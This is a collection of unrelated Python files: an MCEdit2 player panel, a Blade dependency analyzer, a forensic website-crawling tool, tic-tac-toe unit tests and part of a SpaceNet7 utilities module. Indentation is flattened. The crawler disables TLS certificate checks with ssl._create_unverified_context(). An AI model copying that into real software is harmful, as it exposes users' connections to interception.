from mcedit2.widgets.inventory import InventoryEditor
from mcedit2.widgets.layout import Row
from mcedit2.util.resources import resourcePath
from mcedit2.widgets.propertylist import PropertyListModel
from mceditlib.exceptions import PlayerNotFound
log = logging.getLogger(__name__)
def playerSlotLayout():
layout = [(x, 0, 100+x) for x in range(4)] # equipment
layout += [(x, y+1, x+9*y+9) for x, y in itertools.product(range(9), range(3))] # inventory
layout += [(x, 4, x) for x in range(9)] # hotbar
return layout
PLAYER_SLOT_LAYOUT = playerSlotLayout()
class PlayerPropertyChangeCommand(SimpleRevisionCommand):
pass
class PlayerPanel(QtGui.QWidget, Ui_playerWidget):
def __init__(self, editorSession):
"""
:type editorSession: mcedit2.editorsession.EditorSession
:rtype: PlayerPanel
"""
super(PlayerPanel, self).__init__(QtGui.qApp.mainWindow, f=Qt.Tool)
self.setupUi(self)
self.editorSession = editorSession
self.selectedUUID = None
self.nbtEditor.editorSession = self.editorSession
self.inventoryEditor = InventoryEditor(PLAYER_SLOT_LAYOUT)
self.inventoryGroupBox.setLayout(Row(self.inventoryEditor))
self.movePlayerButton.clicked.connect(self.movePlayerToCamera)
self.viewPlayerButton.clicked.connect(self.showPlayerView)
playerUUIDs = list(editorSession.worldEditor.listPlayers())
try:
sp = editorSession.worldEditor.getPlayer("")
singlePlayerUUID = sp.UUID
except (PlayerNotFound, NBTFormatError):
log.info("No single-player.")
singlePlayerUUID = None
except KeyError:
log.info("Failed to get single-player UUID.")
singlePlayerUUID = None
if "" in playerUUIDs:
# Move singleplayer to beginning of list
playerUUIDs.remove("")
playerUUIDs.insert(0, "")
for UUID in playerUUIDs:
if UUID == "":
displayName = "[Single-player](%s)" % singlePlayerUUID
else:
displayName = UUID
try:
UUID = uuid.UUID(hex=UUID)
if UUID == singlePlayerUUID:
displayName = "[Multiplayer](%s)" % singlePlayerUUID
except ValueError: # badly formed uuid?
log.warn("Could not get a UUID from %s", UUID)
continue
idx = self.playerListBox.count()
self.playerListBox.addItem(displayName, UUID)
def _callback(idx, fmt="%s"):
def callback(result, error):
if result:
name = result['name']
self.playerListBox.setItemText(idx, fmt % name)
return callback
if UUID == "":
if singlePlayerUUID:
PlayerDataCache.getPlayerInfo(singlePlayerUUID, _callback(idx, "[Single-player]%s"))
else:
if UUID == singlePlayerUUID:
PlayerDataCache.getPlayerInfo(UUID, _callback(idx, "[Multiplayer]%s"))
else:
PlayerDataCache.getPlayerInfo(UUID, _callback(idx))
self.playerListBox.currentIndexChanged[int].connect(self.setSelectedPlayerIndex)
if len(playerUUIDs):
self.setSelectedPlayerIndex(0)
icon = QtGui.QIcon(resourcePath("mcedit2/assets/mcedit2/icons/edit_player.png"))
action = QtGui.QAction(icon, self.tr("Edit Player"), self)
action.setCheckable(True)
action.triggered.connect(self.toggleView)
self._toggleViewAction = action
self.editorSession.revisionChanged.connect(self.revisionDidChange)
self.initPropertiesWidget()
centerWidgetInScreen(self)
editorSession = weakrefprop()
def initPropertiesWidget(self):
if self.selectedPlayer is None:
self.playerPropertiesWidget.setModel(None)
return
model = PropertyListModel(self.selectedPlayer.rootTag)
addWidget = model.addNBTProperty
addWidget("AbsorptionAmount")
addWidget("Air")
addWidget("DeathTime")
addWidget("Dimension")
addWidget("FallDistance", valueType=float)
addWidget("Fire")
addWidget("foodExhaustionLevel", valueType=float)
addWidget("foodLevel")
addWidget("foodSaturationLevel", valueType=float)
addWidget("foodTickTimer")
addWidget("HealF", valueType=float)
addWidget("Health")
addWidget("HurtByTimestamp")
addWidget("HurtTime")
addWidget("Invulnerable", bool)
addWidget("OnGround", bool)
addWidget("playerGameType", [(0, "Survival"), (1, "Creative"), (2, "Adventure")])
addWidget("PortalCooldown")
addWidget("Score")
addWidget("SelectedItemSlot") # xxx inventory
addWidget("Sleeping", bool)
addWidget("SleepTimer")
addWidget("XpLevel")
addWidget("XpP", float)
addWidget("XpSeed")
addWidget("XpTotal")
self.playerPropertiesWidget.setModel(model)
model.propertyChanged.connect(self.propertyDidChange)
def updateNBTTree(self):
self.nbtEditor.undoCommandPrefixText = ("Player %s: " % self.selectedUUID) if self.selectedUUID else "Single-player: "
self.nbtEditor.setRootTagRef(self.selectedPlayer)
def updateInventory(self):
self.inventoryEditor.editorSession = self.editorSession
self.inventoryEditor.inventoryRef = self.selectedPlayer.Inventory
def revisionDidChange(self):
self.initPropertiesWidget()
self.updateNBTTree()
def propertyDidChange(self, name, value):
if self.selectedUUID != "":
text = "Change player %s property %s" % (self.selectedUUID, name)
else:
text = "Change single-player property %s" % name
command = PlayerPropertyChangeCommand(self.editorSession, text)
with command.begin():
self.selectedPlayer.dirty = True
self.editorSession.worldEditor.syncToDisk()
self.editorSession.pushCommand(command)
def toggleView(self):
if self.isHidden():
self.show()
self._toggleViewAction.setChecked(True)
else:
self.hide()
self._toggleViewAction.setChecked(False)
def closeEvent(self, event):
self.toggleView()
def toggleViewAction(self):
return self._toggleViewAction
def setSelectedPlayerIndex(self, index):
UUID = self.playerListBox.itemData(index)
self.setSelectedPlayerUUID(UUID)
def setSelectedPlayerUUID(self, UUID):
self.selectedUUID = UUID
self.updateNBTTree()
self.updateInventory()
@property
def selectedPlayer(self):
try:
return self.editorSession.worldEditor.getPlayer(self.selectedUUID)
except PlayerNotFound:
log.info("PlayerPanel: player %s not found!", self.selectedUUID)
def movePlayerToCamera(self):
view = self.editorSession.editorTab.currentView()
if view.viewID == "Cam":
command = SimpleRevisionCommand(self.editorSession, "Move Player")
with command.begin():
self.selectedPlayer.Position = view.centerPoint
try:
self.selectedPlayer.Rotation = view.yawPitch
except AttributeError:
pass
self.selectedPlayer.dirty = True # xxx do in AnvilPlayerRef
self.editorSession.pushCommand(command)
else:
raise ValueError("Current view is not camera view.")
def showPlayerView(self):
self.editorSession.editorTab.showCameraView()
view = self.editorSession.editorTab.cameraView
view.setPerspective(True)
view.centerPoint = self.selectedPlayer.Position
view.yawPitch = self.selectedPlayer.Rotation
|
<filename>src/blade/dependency_analyzer.py<gh_stars>0
# Copyright (c) 2011 Tencent Inc.
# All rights reserved.
#
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# Date: October 20, 2011
"""
This is the dependencies expander module which accepts the targets loaded
from BUILD files and will find all of the targets needed by the target and
add extra options according to different target types.
"""
from __future__ import absolute_import
from __future__ import print_function
from blade import console
from blade.util import iteritems, itervalues
def analyze_deps(related_targets):
"""
Analyze the dependency relationship between targets.
Given the map of related targets, i.e., the subset of target_database
that are dependencies of those targets speicifed in Blade command
line, this utility class expands the 'deps' property of each target
to be all direct and indirect dependencies of that target.
After expanded the dependencies of targets, sort the topologically
and then provide the query interface to users by blade manager.
Input: related targets after loading targets from BUILD files.
{target_key : (target_data), ...}
Output:
1. the targets that are expanded
{target_key : (target_data with deps expanded), ...}
2. the keys sorted
[all the targets keys] - sorted
"""
_expand_deps(related_targets)
_expand_dependents(related_targets)
for target in itervalues(related_targets):
target.check_visibility()
# The topological sort is very important because even if ninja doesn't require the order of build statements,
# but when generating code, dependents may access dependency's generated file information, which requires generation
# of dependency ran firstly.
return _topological_sort(related_targets)
def _expand_deps(targets):
"""_expand_deps.
Find out all the targets that certain target depeneds on them.
Fill the related options according to different targets.
"""
for target_id in targets:
target = targets[target_id]
_expand_target_deps(target_id, targets)
target._expand_deps_generation()
def _unique_deps(new_deps_list):
"""Unique dependency list, for duplicate items only keep the later ones."""
result = []
deps = set()
for dep in reversed(new_deps_list):
if dep not in deps:
result.append(dep)
deps.add(dep)
return list(reversed(result))
def _expand_target_deps(target_id, targets, root_targets=None):
"""_expand_target_deps.
Return all targets depended by target_id directly and/or indirectly.
We need the parameter root_target_id to check loopy dependency.
"""
target = targets[target_id]
if target.expanded_deps is not None:
return target.expanded_deps
if root_targets is None:
root_targets = set()
root_targets.add(target_id)
new_deps_list = []
for d in target.deps:
# loop dependency
if d in root_targets:
err_msg = ''
for t in root_targets:
err_msg += '//%s --> ' % t
console.fatal('Loop dependency found: //%s --> [%s]' % (d, err_msg))
new_deps_list.append(d)
new_deps_list += _expand_target_deps(d, targets, root_targets)
target.merge_substitute_deps(targets[d].substitute_deps)
new_deps_list = _unique_deps(new_deps_list)
target.expanded_deps = new_deps_list
root_targets.remove(target_id)
return new_deps_list
def _expand_dependents(related_targets):
"""Build and expand dependents for every targets.
Args:
related_targets: dict{target_key, target} to be built
"""
for target_key, target in iteritems(related_targets):
for depkey in target.deps:
related_targets[depkey].dependents.add(target_key)
for depkey in target.expanded_deps:
related_targets[depkey].expanded_dependents.add(target_key)
def _topological_sort(related_targets):
"""Sort the target keys according to their dependency relationship.
Every dependents before their dependencies, because the dependents should be built earlier.
Args:
related_targets: dict{target_key, target} to be built
Returns:
sorted_target_key, sorted target keys.
"""
numpreds = {} # elt -> # of predecessors
q = []
for target_key, target in iteritems(related_targets):
dep_len = len(target.deps)
numpreds[target_key] = dep_len
if dep_len == 0:
q.append(target_key)
# for everything in queue, knock down the pred count on its dependents
sorted_target_keys = []
while q:
key = q.pop()
sorted_target_keys.append(key)
for depkey in related_targets[key].dependents:
numpreds[depkey] -= 1
if numpreds[depkey] == 0:
q.append(depkey)
assert len(sorted_target_keys) == len(related_targets)
return sorted_target_keys
|
from __future__ import print_function
import argparse
from bs4 import BeautifulSoup, SoupStrainer
from datetime import datetime
import hashlib
import logging
import os
import ssl
import sys
from urllib.request import urlopen
import urllib.error
"""
MIT License
Copyright (c) 2017 <NAME>, <NAME>
Please share comments and questions at:
https://github.com/PythonForensics/PythonForensicsCookbook
or email <EMAIL>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__authors__ = ["<NAME>", "<NAME>"]
__date__ = 20170815
__description__ = "BeautifulSoup Website Preservation Tool"
logger = logging.getLogger(__name__)
def main(website, output_dir):
base_name = website.replace(
"https://", "").replace("http://", "").replace("www.", "")
link_queue = set()
if "http://" not in website and "https://" not in website:
logger.error(
"Exiting preservation - invalid user input: {}".format(
website))
sys.exit(1)
logger.info("Accessing {} webpage".format(website))
context = ssl._create_unverified_context()
try:
index = urlopen(website, context=context).read().decode("utf-8")
except urllib.error.HTTPError as e:
logger.error(
"Exiting preservation - unable to access page: {}".format(
website))
sys.exit(2)
logger.debug("Successfully accessed {}".format(website))
write_output(website, index, output_dir)
link_queue = find_links(base_name, index, link_queue)
logger.info("Found {} initial links on webpage".format(
len(link_queue)))
recurse_pages(website, link_queue, context, output_dir)
logger.info("Completed preservation of {}".format(website))
def find_links(website, page, queue):
for link in BeautifulSoup(page, "html.parser",
parse_only=SoupStrainer("a", href=True)):
if website in link.get("href"):
if not os.path.basename(link.get("href")).startswith("#"):
queue.add(link.get("href"))
return queue
def recurse_pages(website, queue, context, output_dir):
processed = []
counter = 0
while True:
counter += 1
if len(processed) == len(queue):
break
for link in queue.copy():
if link in processed:
continue
processed.append(link)
try:
page = urlopen(link, context=context).read().decode(
"utf-8")
except urllib.error.HTTPError as e:
msg = "Error accessing webpage: {}".format(link)
logger.error(msg)
continue
write_output(link, page, output_dir, counter)
queue = find_links(website, page, queue)
logger.info("Identified {} links throughout website".format(
len(queue)))
def hash_data(data):
sha256 = hashlib.sha256()
sha256.update(data.encode("utf-8"))
return sha256.hexdigest()
def hash_file(file):
sha256 = hashlib.sha256()
with open(file, "rb") as in_file:
sha256.update(in_file.read())
return sha256.hexdigest()
def write_output(name, data, output_dir, counter=0):
name = name.replace("http://", "").replace("https://", "").rstrip("//")
directory = os.path.join(output_dir, os.path.dirname(name))
if not os.path.exists(directory) and os.path.dirname(name) != "":
os.makedirs(directory)
logger.debug("Writing {} to {}".format(name, output_dir))
logger.debug("Data Hash: {}".format(hash_data(data)))
path = os.path.join(output_dir, name)
path = path + "_" + str(counter)
with open(path, "w") as outfile:
outfile.write(data)
logger.debug("Output File Hash: {}".format(hash_file(path)))
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__description__,
epilog="Developed by {} on {}".format(
", ".join(__authors__), __date__)
)
parser.add_argument("DOMAIN", help="Website Domain")
parser.add_argument("OUTPUT_DIR", help="Preservation Output Directory")
parser.add_argument("-l", help="Log file path",
default=__file__[:-3] + ".log")
args = parser.parse_args()
logger.setLevel(logging.DEBUG)
msg_fmt = logging.Formatter("%(asctime)-15s %(funcName)-10s"
"%(levelname)-8s %(message)s")
strhndl = logging.StreamHandler(sys.stderr)
strhndl.setFormatter(fmt=msg_fmt)
fhndl = logging.FileHandler(args.l, mode='a')
fhndl.setFormatter(fmt=msg_fmt)
logger.addHandler(strhndl)
logger.addHandler(fhndl)
logger.info("Starting BS Preservation")
logger.debug("Supplied arguments: {}".format(sys.argv[1:]))
logger.debug("System " + sys.platform)
logger.debug("Version " + sys.version)
if not os.path.exists(args.OUTPUT_DIR):
os.makedirs(args.OUTPUT_DIR)
main(args.DOMAIN, args.OUTPUT_DIR)
|
import numpy as np
import pytest
from utils.helpers import (Game, tuple_to_str, str_to_tuple, array_in_list, moving_average,
state_to_actions, check_states, state_transforms, reverse_transforms, reverse_function,
play_game, value_frequencies, moving_value_frequencies)
@pytest.mark.parametrize(
"won, expected",
[
pytest.param(1, 1, id="won"),
pytest.param(-1, -1, id="lost"),
pytest.param(0, 0, id="tie-or-not-done")
],
)
def test_Game_determine_reward(won, expected):
# arrange
game = Game()
game.won = won
marker = 1
# act
reward = game.determine_reward(marker)
# assert
assert reward == expected
@pytest.mark.parametrize(
"loc, marker, expected",
[
pytest.param((0, 0), 2, False, id="invalid-marker"),
pytest.param((0, 0), -1, False, id="not-turn"),
pytest.param((1, 1), 1, False, id="loc-not-empty"),
pytest.param((0, 0), 1, True, id="valid")
],
)
def test_Game_mark(loc, marker, expected):
# arrange
game = Game()
prev_turn = 1
game.turn = prev_turn
game.state[1, 1] = -1
prev_mark = game.state[loc[0], loc[1]]
# act
valid, _ = game.mark(loc, marker)
expected_turn = int(marker*-1) if valid else prev_turn
expected_mark = marker if valid else prev_mark
# assert
assert valid == expected
assert game.turn == expected_turn
assert game.state[loc[0], loc[1]] == expected_mark
@pytest.mark.parametrize(
"state, expected",
[
pytest.param((1, -1, 1, -1, -1, 1, 1, 1, -1), True, id="full-board"),
pytest.param((1, -1, 1, -1, -1, 1, 1, -1, -1), True, id="won"),
pytest.param((1, -1, 1, 0, -1, 0, 1, 0, -1), False, id="not-done")
],
)
def test_Game_update_done(state, expected):
# arrange
game = Game()
game.state = np.reshape(state, game.board_shape)
# act
game._update_done()
# assert
assert game.done == expected
@pytest.mark.parametrize(
"state, expected",
[
pytest.param((1, -1, 1, -1, -1, 1, 1, 1, -1), Game.empty_marker, id="none"),
pytest.param((-1, -1, 1, 1, -1, 1, 1, 1, -1), -1, id="diag"),
pytest.param((1, -1, 1, -1, -1, 1, 1, -1, -1), -1, id="vert"),
pytest.param((1, -1, 1, -1, -1, -1, 1, 1, -1), -1, id="horiz")
],
)
def test_Game_update_won(state, expected):
# arrange
game = Game()
game.state = np.reshape(state, game.board_shape)
# act
game._update_won()
# assert
assert game.won == expected
@pytest.mark.parametrize(
"tupe, expected",
[
pytest.param(tuple(), '', id="empty"),
pytest.param((0, -1, 1, 0, -1, 1, 1, 0, -1), '0-110-1110-1', id="full")
],
)
def test_tuple_to_str(tupe, expected):
# arrange
# act
string = tuple_to_str(tupe)
# assert
assert isinstance(string, str)
assert string == expected
@pytest.mark.parametrize(
"string, expected",
[
pytest.param('', tuple(), id="empty"),
pytest.param('0-110-1110-1', (0, -1, 1, 0, -1, 1, 1, 0, -1), id="full")
],
)
def test_str_to_tuple(string, expected):
# arrange
# act
tupe = str_to_tuple(string)
# assert
assert isinstance(tupe, tuple)
assert tupe == expected
@pytest.mark.parametrize(
"arr, arr_list, expected",
[
pytest.param([0, 1, 2], [], False, id="empty-list"),
pytest.param([0, 1, 2], [[2, 1, 0], [], [0, -1, 2]], False, id="not-in"),
pytest.param([[0, 1], [2, 3]], [[1, 1], [[0, 1], [2, 3]]], True, id="in"),
],
)
def test_array_in_list(arr, arr_list, expected):
# arrange
arr_in = np.array(arr)
arr_list_in = [np.array(a) for a in arr_list]
# act
is_in = array_in_list(arr_in, arr_list_in)
# assert
assert expected == is_in
@pytest.mark.parametrize(
"vals, n, expected",
[
pytest.param([0, 1, 2, 3, 4], 10, [], id="n>len(vals)"),
pytest.param([0, 1, 2, 3, 4], 3, [1, 2, 3], id="normal"),
],
)
def test_moving_average(vals, n, expected):
# arrange
expected_length = (len(vals) - (n - 1)) if n < len(vals) else 0
# act
ma = moving_average(vals, n=n)
# assert
assert len(ma) == expected_length
assert np.array_equal(ma, np.array(expected))
def test_moving_average_invalid_n():
# arrange
n = 0
vals = [1, 2, 3]
# act + assert
with pytest.raises(ValueError):
_ = moving_average(vals, n)
@pytest.mark.skip(reason='side effects')
def test_play_game():
pass
@pytest.mark.skip(reason='side effects')
def test_play_round_of_games():
pass
@pytest.mark.skip(reason='side effects')
def test_replay_loss():
pass
def test_state_to_actions():
# arrange
state = (0, 1, -1, 1, 0, -1, -1, 1, 0)
expected_actions = [(0, 0), (1, 1), (2, 2)]
# act
actions = state_to_actions(state, Game.ind_to_loc, Game.empty_marker)
# assert
assert set(actions) == set(expected_actions)
def test_check_states():
# arrange
state = np.reshape((0, 1, -1, 0, 0, -1, -1, 1, 1), Game.board_shape)
expected_count = 12
expected_transforms = [
{'func': None, 'args': {}},
{'func': np.rot90, 'args': {'k': 1}},
{'func': np.rot90, 'args': {'k': 2}},
{'func': np.rot90, 'args': {'k': 3}},
{'func': np.fliplr, 'args': {}},
{'func': np.flipud, 'args': {}}
]
expected_states = {
(0, 1, -1, 0, 0, -1, -1, 1, 1),
(-1, -1, 1, 1, 0, 1, 0, 0, -1),
(1, 1, -1, -1, 0, 0, -1, 1, 0),
(-1, 0, 0, 1, 0, 1, 1, -1, -1),
(-1, 1, 0, -1, 0, 0, 1, 1, -1),
(-1, 1, 1, 0, 0, -1, 0, 1, -1),
(0, -1, 1, 0, 0, 1, 1, -1, -1),
(1, 1, -1, -1, 0, -1, 0, 0, 1),
(-1, -1, 1, 1, 0, 0, 1, -1, 0),
(1, 0, 0, -1, 0, -1, -1, 1, 1),
(1, -1, 0, 1, 0, 0, -1, -1, 1),
(1, -1, -1, 0, 0, 1, 0, -1, 1)
}
# act
states, transforms = check_states(state)
# assert
assert len(states) == expected_count
assert len(transforms) == expected_count
assert set(states) == expected_states
assert all([t in transforms for t in expected_transforms])
def test_state_transforms():
# arrange
state = (0, 1, -1, 0, 0, -1, -1, 1, 1)
expected_count = 6
expected_transforms = [
{'func': None, 'args': {}},
{'func': np.rot90, 'args': {'k': 1}},
{'func': np.rot90, 'args': {'k': 2}},
{'func': np.rot90, 'args': {'k': 3}},
{'func': np.fliplr, 'args': {}},
{'func': np.flipud, 'args': {}}
]
expected_states = {
(0, 1, -1, 0, 0, -1, -1, 1, 1),
(-1, -1, 1, 1, 0, 1, 0, 0, -1),
(1, 1, -1, -1, 0, 0, -1, 1, 0),
(-1, 0, 0, 1, 0, 1, 1, -1, -1),
(-1, 1, 0, -1, 0, 0, 1, 1, -1),
(-1, 1, 1, 0, 0, -1, 0, 1, -1)
}
# act
states, transforms = state_transforms(state)
# assert
assert len(states) == expected_count
assert len(transforms) == expected_count
assert set(states) == expected_states
assert all([t in transforms for t in expected_transforms])
def test_reverse_transform():
# arrange
action_values = {
(0, 0): 0,
(0, 1): 0.1,
(0, 2): 0.2,
(1, 0): 0.3,
(1, 1): 0.4,
(2, 2): 0.5,
(2, 0): 0.6,
(2, 1): 0.7,
(2, 2): 0.8
}
transform = {'func': np.fliplr, 'args': {}}
expected_values = [action_values[act] for act in action_values]
# act
adj_values = reverse_transforms(action_values, transform, Game.ind_to_loc)
values = [adj_values[act] for act in adj_values]
print(adj_values)
# assert
assert len(adj_values) == len(action_values)
assert set(values) == set(expected_values)
@pytest.mark.parametrize(
"loc, func, func_args, expected_loc",
[
pytest.param((0, 1), None, {}, (0, 1), id="none"),
pytest.param((0, 1), np.rot90, {'k': -1}, (1, 2), id="rot90"),
pytest.param((0, 1), np.rot90, {'k': -2}, (2, 1), id="rot180"),
pytest.param((0, 1), np.rot90, {'k': -3}, (1, 0), id="rot270"),
pytest.param((0, 1), np.fliplr, {}, (0, 1), id="fliplr"),
pytest.param((0, 1), np.flipud, {}, (2, 1), id="flipud"),
],
)
def test_reverse_function(loc, func, func_args, expected_loc):
# arrange
# act
new_loc = reverse_function(loc, Game.ind_to_loc, func, func_args)
# assert
assert new_loc == expected_loc
def test_value_frequencies():
# arrange
values = [1, 0, 0, 0, -1, -1, 1, -1, 0, 0]
expected_values = set(np.unique(values))
expected_length = len(expected_values)
expected_freqs = {0: 0.5, 1: 0.2, -1: 0.3}
# act
freqs = value_frequencies(values)
# assert
assert len(freqs) == expected_length
assert set([v for v in freqs]) == expected_values
for v in expected_freqs:
assert expected_freqs[v] == freqs[v]
@pytest.mark.parametrize(
"vals, n, expected",
[
pytest.param([1, 0, 0, 0, -1, -1, 1, -1, 0, 0], 20,
{0: [], 1: [], -1: []}, id="n>len(vals)"),
pytest.param([1, 0, 0, 0, -1, -1, 1, -1, 0, 0], 5,
{0: [0.6, 0.6, 0.4, 0.2, 0.2, 0.4],
1: [0.2, 0.0, 0.2, 0.2, 0.2, 0.2],
-1: [0.2, 0.4, 0.4, 0.6, 0.6, 0.4]}, id="normal"),
],
)
def test_moving_value_frequencies(vals, n, expected):
# arrange
expected_value_count = len(set(np.unique(vals)))
# act
freqs = moving_value_frequencies(vals, n=n)
# assert
assert len(freqs) == expected_value_count
for v in expected:
assert expected[v] == freqs[v]
def test_moving_value_frequencies_invalid_n():
# arrange
n = -1
vals = [1, 2, 3]
# act + assert
with pytest.raises(ValueError):
_ = moving_value_frequencies(vals, n)
@pytest.mark.skip(reason='plotting helper')
def test_plot_outcome_frequencies():
pass |
<reponame>remtav/SpaceNet7_Multi-Temporal_Solutions
import csv
import logging
import numbers
import subprocess
from pathlib import Path
from typing import Sequence, List
import torch
# import torch should be first. Unclear issue, mentioned here: https://github.com/pytorch/pytorch/issues/2083
from torch import nn
import numpy as np
import scipy.signal
import warnings
import requests
import collections
# These two import statements prevent exception when using eval(metadata) in SegmentationDataset()'s __init__()
from rasterio.crs import CRS
from affine import Affine
from utils.readers import read_parameters
from urllib.parse import urlparse
try:
from ruamel_yaml import YAML
except ImportError:
from ruamel.yaml import YAML
try:
from pynvml import *
except ModuleNotFoundError:
warnings.warn(f"The python Nvidia management library could not be imported. Ignore if running on CPU only.")
try:
import boto3
except ModuleNotFoundError:
warnings.warn('The boto3 library counldn\'t be imported. Ignore if not using AWS s3 buckets', ImportWarning)
pass
logging.getLogger(__name__)
class Interpolate(torch.nn.Module):
def __init__(self, mode, scale_factor):
super(Interpolate, self).__init__()
self.interp = torch.nn.functional.interpolate
self.scale_factor = scale_factor
self.mode = mode
def forward(self, x):
x = self.interp(x, scale_factor=self.scale_factor, mode=self.mode, align_corners=False)
return x
def load_from_checkpoint(checkpoint, model, optimizer=None, inference:str=''):
"""Load weights from a previous checkpoint
Args:
checkpoint: (dict) checkpoint
model: model to replace
optimizer: optimiser to be used
inference: (str) path to inference state_dict. If given, loading will be strict (see pytorch doc)
"""
# Corrects exception with test loop. Problem with loading generic checkpoint into DataParallel model model.load_state_dict(checkpoint['model'])
# https://github.com/bearpaw/pytorch-classification/issues/27
# https://discuss.pytorch.org/t/solved-keyerror-unexpected-key-module-encoder-embedding-weight-in-state-dict/1686/3
if isinstance(model, nn.DataParallel) and not list(checkpoint['model'].keys())[0].startswith('module'):
new_state_dict = model.state_dict().copy()
new_state_dict['model'] = {'module.'+k: v for k, v in checkpoint['model'].items()} # Very flimsy
del checkpoint
checkpoint = {}
checkpoint['model'] = new_state_dict['model']
strict_loading = False if not inference else True
model.load_state_dict(checkpoint['model'], strict=strict_loading)
logging.info(f"=> loaded model\n")
if optimizer and 'optimizer' in checkpoint.keys(): # 2nd condition if loading a model without optimizer
optimizer.load_state_dict(checkpoint['optimizer'], strict=False)
return model, optimizer
def list_s3_subfolders(bucket, data_path):
list_classes = []
client = boto3.client('s3')
result = client.list_objects(Bucket=bucket, Prefix=data_path+'/', Delimiter='/')
for p in result.get('CommonPrefixes'):
if p['Prefix'].split('/')[-2] is not data_path:
list_classes.append(p['Prefix'].split('/')[-2])
return list_classes
def get_device_ids(number_requested: int,
max_used_ram_perc: int = 25,
max_used_perc: int = 15):
"""
Function to check which GPU devices are available and unused.
:param number_requested: (int) Number of devices requested.
:param max_used_ram_perc: (int) If RAM usage of detected GPU exceeds this percentage, it will be ignored
:param max_used_perc: (int) If GPU's usage exceeds this percentage, it will be ignored
:return: (list) Unused GPU devices.
"""
lst_free_devices = {}
if not number_requested:
logging.warning(f'No GPUs requested. This training will run on CPU')
return lst_free_devices
if not torch.cuda.is_available():
logging.error(f'Requested {number_requested} GPUs, but no CUDA devices found. This training will run on CPU')
return lst_free_devices
try:
nvmlInit()
if number_requested > 0:
device_count = nvmlDeviceGetCount()
for i in range(device_count):
res, mem = gpu_stats(i)
used_ram = mem.used / (1024 ** 2)
max_ram = mem.total / (1024 ** 2)
used_ram_perc = used_ram / max_ram * 100
logging.debug(f'GPU RAM used: {used_ram_perc} ({used_ram:.0f}/{max_ram:.0f} MiB)\nGPU % used: {res.gpu}')
if used_ram_perc < max_used_ram_perc:
if res.gpu < max_used_perc:
lst_free_devices[i] = {'used_ram_at_init': used_ram, 'max_ram': max_ram}
else:
logging.warning(f'Gpu #{i} filtered out based on usage % threshold.\n'
f'Current % usage: {res.gpu}\n'
f'Max % usage allowed by user: {max_used_perc}.')
else:
logging.warning(f'Gpu #{i} filtered out based on RAM threshold.\n'
f'Current RAM usage: {used_ram}/{max_ram}\n'
f'Max used RAM allowed by user: {max_used_ram_perc}.')
if len(lst_free_devices.keys()) == number_requested:
break
if len(lst_free_devices.keys()) < number_requested:
logging.warning(f"You requested {number_requested} devices. {device_count} devices are available and "
f"other processes are using {device_count-len(lst_free_devices.keys())} device(s).")
else:
logging.error('No gpu devices requested. Will run on cpu')
except NameError as error:
raise NameError(f"{error}. Make sure that the NVIDIA management library (pynvml) is installed and running.")
except NVMLError as error:
raise ValueError(f"{error}. Make sure that the latest NVIDIA driver is installed and running.")
return lst_free_devices
def gpu_stats(device=0):
"""
Provides GPU utilization (%) and RAM usage
:return: res.gpu, res.memory
"""
nvmlInit()
handle = nvmlDeviceGetHandleByIndex(device)
res = nvmlDeviceGetUtilizationRates(handle)
mem = nvmlDeviceGetMemoryInfo(handle)
return res, mem
def get_key_def(key, config, default=None, msg=None, delete=False, expected_type=None):
"""Returns a value given a dictionary key, or the default value if it cannot be found.
:param key: key in dictionary (e.g. generated from .yaml)
:param config: (dict) dictionary containing keys corresponding to parameters used in script
:param default: default value assigned if no value found with provided key
:param msg: message returned with AssertionError si length of key is smaller or equal to 1
:param delete: (bool) if True, deletes parameter, e.g. for one-time use.
:return:
"""
if not config:
return default
elif isinstance(key, list): # is key a list?
if len(key) <= 1: # is list of length 1 or shorter? else --> default
if msg is not None:
raise AssertionError(msg)
else:
raise AssertionError("Must provide at least two valid keys to test")
for k in key: # iterate through items in list
if k in config: # if item is a key in config, set value.
val = config[k]
if delete: # optionally delete parameter after defining a variable with it
del config[k]
val = default
else: # if key is not a list
if key not in config or config[key] is None: # if key not in config dict
val = default
else:
val = config[key] if config[key] != 'None' else None
if expected_type and val is not False:
assert isinstance(val, expected_type), f"{val} is of type {type(val)}, expected {expected_type}"
if delete:
del config[key]
return val
def minmax_scale(img, scale_range=(0, 1), orig_range=(0, 255)):
"""
scale data values from original range to specified range
:param img: (numpy array) Image to be scaled
:param scale_range: Desired range of transformed data (0, 1) or (-1, 1).
:param orig_range: Original range of input data.
:return: (numpy array) Scaled image
"""
assert scale_range == (0, 1) or scale_range == (-1, 1), 'expects scale_range as (0, 1) or (-1, 1)'
if scale_range == (0, 1):
scale_img = (img.astype(np.float32) - orig_range[0]) / (orig_range[1] - orig_range[0])
else:
scale_img = 2.0 * (img.astype(np.float32) - orig_range[0]) / (orig_range[1] - orig_range[0]) - 1.0
return scale_img
def unscale(img, float_range=(0, 1), orig_range=(0, 255)):
"""
unscale data values from float range (0, 1) or (-1, 1) to original range (0, 255)
:param img: (numpy array) Image to be scaled
:param float_range: (0, 1) or (-1, 1).
:param orig_range: (0, 255) or (0, 65535).
:return: (numpy array) Unscaled image
"""
f_r = float_range[1] - float_range[0]
o_r = orig_range[1] - orig_range[0]
return (o_r * (img - float_range[0]) / f_r) + orig_range[0]
def pad(img, padding, fill=0):
r"""Pad the given ndarray on all sides with specified padding mode and fill value.
Adapted from https://github.com/pytorch/vision/blob/master/torchvision/transforms/functional.py#L255
Args:
img (ndarray): Image to be padded.
padding (int or tuple): Padding on each border. If a single int is provided this
